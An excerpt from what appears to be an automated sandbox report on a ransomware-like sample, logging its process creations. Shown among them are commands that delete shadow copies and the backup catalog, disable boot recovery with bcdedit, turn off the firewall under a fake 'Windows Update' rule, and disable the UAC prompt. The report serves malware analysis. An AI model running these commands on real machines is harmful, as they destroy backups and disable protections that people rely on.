                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -EmbeddingJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: 53c0505a_by_Libranalysis.exe, 00000000.00000003.232327020.00000000024A5000.00000004.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000003.264116735.0000000002715000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: 53c0505a_by_Libranalysis.exe, 00000000.00000003.232327020.00000000024A5000.00000004.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000003.264116735.0000000002715000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_0040AD76 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040AD76
                      Source: 53c0505a_by_Libranalysis.exeStatic PE information: section name: .code
                      Source: 53c0505a_by_Libranalysis.exe.2.drStatic PE information: section name: .code

                      Persistence and Installation Behavior:

                      barindex
                      Uses bcdedit to modify the Windows boot settingsShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit off
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions off
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootems no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit off
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions off
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootems no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootems noJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
